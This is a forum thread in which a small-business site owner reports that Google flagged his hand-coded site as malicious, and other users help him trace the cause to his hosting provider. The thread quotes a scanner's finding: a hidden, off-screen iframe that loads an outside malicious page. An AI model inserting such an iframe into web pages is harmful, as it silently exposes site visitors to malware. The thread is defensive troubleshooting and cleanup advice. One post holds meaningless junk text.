Malware on my Website!

kipple

Today I got an email from google informing me that my website has malware. I coded the site myself, it is simple there is no possibility of me putting in malware. I am with digiweb.

google has a This site may harm your computer tag when serching for my site which is most distressing to see.

My website is: dublinrolfing.com

Sucuri sitecheck gives me the following

Hidden Iframes.
Details: http://sucuri.net/malware/entry/MW:IFRAME:HD202
<iframe src=http://ajaxfamilies.org/go.php?sid=3 width=1 height=1 style="visibility:hidden;position:absolute;top:-10;left:-1337;">

Can I assume that my site was hacked? and what can I do about this?

I want to log into digiweb services, delete my site and re build it. But digiweb have migrated to different software and I can not find out how to do ftp access. The irony hackers can access my site and I cant.

Could this be something to do with the digiweb migration.


Please help.

kipple

Changed passwords.

I removed the Google Analytics web tracking code as I didnt understand it as so it could be infected. There was a unknown .php file which I removed.

Re scanned with Sucuri SiteCheck and it came up clean. Re submitted to google.

Hi, If you coded it yourself then there is a high probability its vulnerable. Do you use wordpress any anything along those lines?

Google launched an initiative in the past year to actively look for and contact the owners of websites it thinks have been tampered with, it's actually quite impressive... google it and you'll find information about it.

You did the correct thing - change the password.

I can't seem to access your site? Did you take it down?

tricky D

This might help depending on what happened:

Get in touch with digiweb for ftp details.

Go through every file and remove any offending iframe calls and any other dodgy script calls which might also have been injected.
Scour every directory for .htaccess files which include dodgy redirects.
Resubmit for review to Google through webmaster tools and at https://www.stopbadware.org/request-review

Try in future to use sftp with a very strong password, keep stuff like WordPress or the like up to date and backup your files properly.

Give your own machine a good cleaning with the likes of malware malwarebytes (mbam) and some other utils. Also have a look at advice here: http://www.boards.ie/vbulletin/showthread.php?t=2055274237

kipple

Thanks for the advice.

Yes my site is down, not sure why. I can not log in to ftp so could be a digiweb problem?

On passwords digiweb have a 10 character maximum. Which should be fine unless the database got hacked.

I found this arstechnica piece fascinating:

http://arstechnica.com/security/2013/05/how-crackers-make-minced-meat-out-of-your-passwords/2/

It's a good article, length and complexity are key.. people think it's its random then it doesn't need to be long.

The fact that your site is down is a little concerning.... I don't think Digiweb would be down... best contact them and find out if they're experiencing problems.

..87df lk09_.

dfagfgasfgdfagfgasfgdfagfgasfgdfagfgasfgdfagfgasfgdfagfgasfgdfagfgasfgdfagfgasfgdfagfgasfgdfagfgasfgdfagfgasfgdfagfgasfgdfagfgasfg

Jane Blonde

this might be an important update to this post but it's starting to look like the problem is with Digiweb and not just your site. I have seen other sites also hosted on digiweb web3.host.ie that have the same symptoms.

Take a look at this article:
http://blog.sucuri.net/2013/06/new-apache-module-injection.html

Any techies that can shed some light here?

kipple

Take a look at this article:
http://blog.sucuri.net/2013/06/new-a...injection.html

Yes that is it!! I moved providers as Digiweb refused to acknowledge that it was their problem. Scary piece of malware. My site was infected with this for over a week and my site was still not blocked by google.

So if it was getting around google blocking my site so it potentially means when people post links on boards they could be infected.

fixmypc.ie

@kipple: I may be able to help you, am a web developer. Can you please tell me what kind of website is it? Static or Dynamic? I mean does the pages end with .htm/ .html or with .php? Do you have backend where the content etc can be updated? Is it built on some framework like wordpress, zoomla etc?

i am sorry for all these questions, just trying to get a feel of the environment.

Jane Blonde

Hi Kipple, it's built on Xoops, are you familar?

kipple

fixmypc,

Thank you for the offer!
The site was all html, I coded it myself using notepad, and no php and no backend and no framework. I have moved provider and the problem has gone.